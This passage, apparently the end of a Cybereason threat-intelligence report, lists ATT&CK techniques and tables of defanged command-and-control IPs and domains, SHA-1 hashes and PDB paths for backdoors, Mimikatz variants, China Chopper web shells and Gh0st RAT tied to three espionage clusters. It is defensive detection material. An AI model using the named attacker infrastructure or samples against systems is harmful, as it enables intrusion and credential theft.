**Defense Evasion:** [Masquerading](https://attack.mitre.org/techniques/T1036/), Deobfuscate/Decode Files or Information

**Credential Access:** Network Sniffing

**Discovery:** Account Discovery, Remote System Discovery

**Command and Control:** [Web Protocols](https://attack.mitre.org/techniques/T1071/001/)

**Exfiltration:** Exfiltration Over C2 Channel

### Indicators of Compromise | DeadRinger

**Note: Not all IOCs observed in the attacks could be shared in our public report.**

**Cluster A - Soft Cell Activity**

| Indicator | Type | Associated Tool |
|---|---|---|
| 47.56.86[.]44 | IP Address | PcShare Backdoor |
| 45.76.213[.]2 | IP Address | PcShare Backdoor |
| 45.123.118[.]232 | IP Address | PcShare Backdoor |
| 19e961e2642e87deb2db6ca8fc2342f4b688a45c | SHA-1 Hash | PcShare Backdoor |
| ba8f2843e2fb5274394b3c81abc3c2202d9ba592 | SHA-1 Hash | PcShare Backdoor |
| 101.132.251[.]212 | IP Address | Cobalt Strike (iediag.dll) |
| Cymkpuadkduz[.]xyz | Domain | Cobalt Strike (iediag.dll) |
| 243cd77cfa03f58f6e6568e011e1d6d85969a3a2 | SHA-1 Hash | Cobalt Strike (iediag.dll) |
| c549a16aaa9901c652b7bc576e980ec2a008a2e0 | SHA-1 Hash | Mscorsvc.dll - Mimikatz |
| c2850993bffc8330cff3cb89e9c7652b8819f57f | SHA-1 Hash | Mimikatz (PowerShell Empire) |
| 440e04d0cc5e842c94793baf31e0d188511f0ace | SHA-1 Hash | D64.exe - Mimikatz |
| e2340b27a4b759e0e2842bfe5aa48dda7450af4c | SHA-1 Hash | Mimikatz |
| 15336340db8b73bf73a17c227eb0c59b5a4dece2 | SHA-1 Hash | China Chopper WebShell (owaauth.aspx) |
| 5bc5dbe3a2ffd5ed1cd9f0c562564c8b72ae2055 | SHA-1 Hash | China Chopper WebShell (error4.aspx) |

**Cluster B - Suspected Naikon APT**

| Indicator | Type | Associated Tool |
|---|---|---|
| nw.eiyfmrn[.]com | Domain | Nebulae backdoor C2 |
| jdk.gsvvfsso[.]com | Domain | Nebulae backdoor C2 |
| 0dc49c5438a5d80ef31df4a4ccaab92685da3fc6 | SHA-1 Hash | Nebulae backdoor (chrome_frame_helper.dll) |
| 81cfcf3f8213bce4ca6a460e1db9e7dd1474ba52 | SHA-1 Hash | PotPlayer.dll.txt (EnrollLogger keylogger) |
| e93ceb7938120a87c6c69434a6815f0da42ab7f2 | SHA-1 Hash | Chrome.exe - Mimikatz |

**Cluster C - Potentially Linked to Group-3390**

| Indicator | Type | Associated Tool |
|---|---|---|
| 207b7cf5db59d70d4789cb91194c732bcd1cfb4b | SHA-1 Hash | Microsoft.Exchange.Clients.Event.dll |
| 71999e468252b7458e06f76b5c746a4f4b3aaa58 | SHA-1 Hash | Microsoft.Exchange.Clients.Event.dll |

### Additional Nebulae Backdoor IOCs Potentially Linked to Other Attacks

| Indicator | Type | Associated Tool |
|---|---|---|
| 39c5c45dbec92fa99ad37c4bab09164325dbeea0 | SHA-1 Hash | Nebulae backdoor (additional payload, potentially related to other attacks) |
| efc6c117ecc6253ed7400c53b2e148d5e4068636 | SHA-1 Hash | Nebulae backdoor (additional payload, potentially related to other attacks) |
| a3c5c0e93f6925846fab5f3c69094d8a465828e9 | SHA-1 Hash | Nebulae backdoor (additional payload, potentially related to other attacks) |
| a4232973418ee44713e59e0eae2381a42db5f54c | SHA-1 Hash | Nebulae backdoor (additional payload, potentially related to other attacks) |
| 5602bf8710b1521f6284685d835d5d1df0679b0f | SHA-1 Hash | Nebulae backdoor (additional payload, potentially related to other attacks) |
| e3fcda85f5f42a2bffb65f3b8deeb523f8db2302 | SHA-1 Hash | Nebulae backdoor (additional payload, potentially related to other attacks) |
| 720556854fb4bcf83b9ceb9515fbe3f5cb182dd5 | SHA-1 Hash | Nebulae backdoor (additional payload, potentially related to other attacks) |
| b699861850e4e6fde73dfbdb761645e2270f9c9a | SHA-1 Hash | Nebulae backdoor (additional payload, potentially related to other attacks) |
| 6516d73f8d4dba83ca8c0330d3f180c0830af6a0 | SHA-1 Hash | Nebulae backdoor (additional payload, potentially related to other attacks) |
| 99f8263808c7e737667a73a606cbb8bf0d6f0980 | SHA-1 Hash | Nebulae backdoor (additional payload, potentially related to other attacks) |
| a5b193118960184fe3aa3b1ea7d8fd1c00423ed6 | SHA-1 Hash | Nebulae backdoor (additional payload, potentially related to other attacks) |
| 92ce6af826d2fb8a03d6de7d8aa930b4f94bc2db | SHA-1 Hash | Nebulae backdoor (additional payload, potentially related to other attacks) |
| d9e828fb891f033656a0797f5fc6d276fbc9748f | SHA-1 Hash | Nebulae backdoor (additional payload, potentially related to other attacks) |
| 87c3dc2ae65dcd818c12c1a4e4368f05719dc036 | SHA-1 Hash | Nebulae backdoor (additional payload, potentially related to other attacks) |
| ttareyice.jkub[.]com | Domain | Nebulae backdoor C2 (potentially related to other attacks) |
| my.eiyfmrn[.]com | Domain | Nebulae backdoor C2 (potentially related to other attacks) |
| A.jrmfeeder[.]org | Domain | Nebulae backdoor C2 (potentially related to other attacks) |
| afhkl.dseqoorg[.]com | Domain | Nebulae backdoor C2 (potentially related to other attacks) |

### Appendix A: Related Samples to Soft Cell

Additional samples that could be part of the arsenal used by Soft Cell:

| PDB Path | SHA-1 Hash | Comment |
|---|---|---|
| E:\vs_proj\serviceFilter_NET2.0\serviceFilter\obj\Release\serviceFilter.pdb | d028ecba36e834766b57669778d3d16b309534f4 | Modified ChinaChopper |
| E:\vs_proj\DeployFilter_NET2.0\DeployFilter\obj\Release\DeployFilter.pdb | 538c710dc6228e2eddec8925944adc417112a697 | ChipShot |
| E:\vs_proj\serviceFilter_NET4.5\serviceFilter\obj\Release\serviceFilter.pdb | e5efe342950e58fafe77226f2f5f04568c0fac5d | Modified ChinaChopper |
| E:\vs_proj\DeployFilter_NET4.5\DeployFilter\obj\Release\DeployFilter.pdb | 79ad43e3ec3440d107e7d6a5c3d3d42b1097d088 | ChipShot |
| E:\simplify_modify\x64\simplify.pdb | 79ef78a797403a4ed1a616c68e07fff868a8650a, 9c5e496921e3bc882dc40694f1dcc3746a75db19, 4f808abc12ab52450062e0ab26a480a228115d96, f0d38de7e9994a4dffdb7f10d18e326235e3d667, 68e7fc1ea8799c14a993b74c249fef77d0ef8f28 | Mimikatz; signed by "Whizzimo, LLC" |
| E:\simplify_modify\Win32\simplify.pdb | aeb573accfd95758550cf30bf04f389a92922844 | Mimikatz |
| E:\vs_proj\gh0st3.6_src_Unicode\gh0st\Release\gh0st.pdb | e994c00ebd3e7016c9343a18742470f4a03ad5ae | Gh0st RAT |
| E:\vs_proj\remoteServer\Release\remoteServer.pdb | b681897f805fc337201e208264f36e6d66b9e363 | Gh0st RAT |
| E:\vs_proj\remoteManager\Release\remoteServer.pdb | 47b1d607db587d932e5986804a68dbda5b385905 | Gh0st RAT |
| E:\vs_proj\remoteManager_new\server\Release\remoteServer.pdb | 2a2849cb6d4f503a9ee95827a7e05f5d78333dc5 | Gh0st RAT |
| E:\vs_proj\simplify_modify\Win32\simplify.pdb | 7cb7bcb9187f8faf47fd77cf1213ab3fe2350a77 | Mimikatz |
| E:\vs_proj\mimkTools\dcsync_new\x64\dcsync64.pdb | 440e04d0cc5e842c94793baf31e0d188511f0ace | Mimikatz |

About the Author

**Cybereason Nocturnus**

The Cybereason Nocturnus Team has brought the world's brightest minds from the military, government intelligence, and enterprise security to uncover emerging threats across the globe.
They specialize in analyzing new attack methodologies, reverse-engineering malware, and exposing unknown system vulnerabilities. The Cybereason Nocturnus Team was the first to release a vaccination for the 2017 NotPetya and Bad Rabbit cyberattacks.

[All Posts by Cybereason Nocturnus](https://www.cybereason.com/blog/authors/cybereason-nocturnus)